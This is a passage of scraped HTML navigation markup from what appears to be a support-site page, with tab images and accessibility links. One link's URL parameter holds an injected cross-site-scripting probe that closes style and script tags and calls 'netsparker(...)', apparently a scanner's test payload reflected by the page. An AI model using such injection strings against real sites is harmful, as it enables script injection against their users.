href="myovr.php?OLTSite=3&p_sid=KwFvjKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_lva=372'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0022B2)%5C/script%5E&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect=3"> hide accessible links </a> &nbsp;</td> <td width="1%" valign="bottom"> <table width="1%" cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1%" class="tabbtn" align="left" valign="to